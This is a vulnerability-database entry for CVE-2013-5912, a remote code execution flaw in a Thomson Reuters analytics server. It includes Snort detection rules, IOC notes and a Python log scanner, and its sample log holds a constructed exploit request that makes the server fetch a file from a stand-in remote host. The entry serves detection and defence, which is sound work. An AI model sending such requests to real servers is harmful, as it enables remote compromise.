CVE-2013-5912
published 2013-11-28

Priority: P278 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 31.43% (98.1th percentile)

VhttpdMgr in Thomson Reuters Velocity Analytics Vhayu Analytic Server 6.94 build 2995 allows remote attackers to execute arbitrary code via a URL in the fileName parameter during an importFile action.

Affected

1 range
Vendor: thomsonreuters
Product: velocity_analytics_vhayu_analytic_server
Version range: (none listed)
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

url: /VhttpdMgr?action=importFile&fileName=
path: /VhttpdMgr
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995 CVE-2013-5912 (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/VhttpdMgr?action=importFile&fileName="; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2013-5192; classtype:attempted-admin; sid:2029166; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2013_5192, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
snort
alert http $EXTERNAL_NET any -> any any (msg:"ET EXPLOIT Thomson Reuters Velocity Analytics Vhayu Analytic Servers 6.94 build 2995 CVE-2013-5912 (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/VhttpdMgr?action=importFile&fileName="; startswith; fast_pattern; content:"http"; distance:0; reference:url,unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/; reference:cve,2013-5192; classtype:attempted-admin; sid:2029167; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2019_12_16, cve CVE_2013_5192, deployment Perimeter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
  • Exploit is triggered via an HTTP GET request to /VhttpdMgr with action=importFile and a remote URL supplied in the fileName parameter; look for HTTP GET requests where the URI starts with /VhttpdMgr?action=importFile&fileName= followed by an http:// or https:// URL.
  • The vulnerability is exploited by remote attackers supplying a URL in the fileName parameter during an importFile action, enabling remote code execution; monitor for outbound connections from the server immediately following such requests (server fetching attacker-controlled payload).
  • Exploitation grants SYSTEM-level privileges; any process spawned by the Vhayu Analytic Server (VhttpdMgr) following an importFile request should be treated as highly suspicious.
  • This vulnerability has been observed exploited in the wild by the Mirai variant EchoBot; correlate detections with known Mirai/EchoBot IoT botnet infrastructure.
  • The ET Snort rules (sid:2029166 and sid:2029167) reference CVE-2013-5192 in their metadata, which appears to be a typo/mislabeling; the correct CVE for this vulnerability is CVE-2013-5912. Ensure any rule tuning or suppression is applied to the correct CVE.
  • The Snort rules detect the URI prefix /VhttpdMgr?action=importFile&fileName= followed by content:"http" at distance:0, so they match only when the string http follows the prefix (i.e., the fileName value carries a remote URL); local file path payloads would not be caught by these rules.
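
The log-side check described in the bullets above, as an added example (not taken from the ET ruleset or any vendor tooling): it flags every importFile request to /VhttpdMgr and records whether the ET signatures would also have fired, which exposes the coverage gap noted in the last bullet. The log lines, addresses, function names and the combined-log-format assumption are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Dec/2019:10:01:02 +0000] "GET /VhttpdMgr?action=importFile&fileName=http://203.0.113.9/x HTTP/1.1" 200 12
198.51.100.7 - - [16/Dec/2019:10:01:05 +0000] "GET /VhttpdMgr?action=importFile&fileName=reports%2Fdata.csv HTTP/1.1" 200 12
192.0.2.44 - - [16/Dec/2019:10:02:11 +0000] "GET /VhttpdMgr?action=status HTTP/1.1" 200 88
192.0.2.44 - - [16/Dec/2019:10:03:40 +0000] "GET /index.html HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(\S+) (\S+) [^"]*"')
ET_PREFIX = "/VhttpdMgr?action=importFile&fileName="  # prefix used by sid 2029166/2029167


def classify(method, uri):
    """Return None for unrelated requests, else details of the importFile call."""
    parts = urlsplit(uri)
    if parts.path != "/VhttpdMgr":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if "importFile" not in query.get("action", []) or "fileName" not in query:
        return None
    file_name = query["fileName"][0]
    remote = file_name.lower().startswith(("http://", "https://"))
    # Approximation of the ET signatures: GET, raw URI starts with the
    # prefix, and "http" occurs somewhere after it.
    et_match = (method == "GET" and uri.startswith(ET_PREFIX)
                and "http" in uri[len(ET_PREFIX):])
    return {"file_name": file_name, "remote_url": remote,
            "et_rule_would_match": et_match}


def scan(log_text):
    """Return one finding per importFile request found in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, method, uri = m.groups()
        hit = classify(method, uri)
        if hit:
            findings.append({"client": client, **hit})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with remote_url set are the ones to correlate with outbound connections and child processes of the server; findings where et_rule_would_match is false are requests the network signatures alone would have missed.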

CVSS provenance

nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck · 10.0 · CRITICAL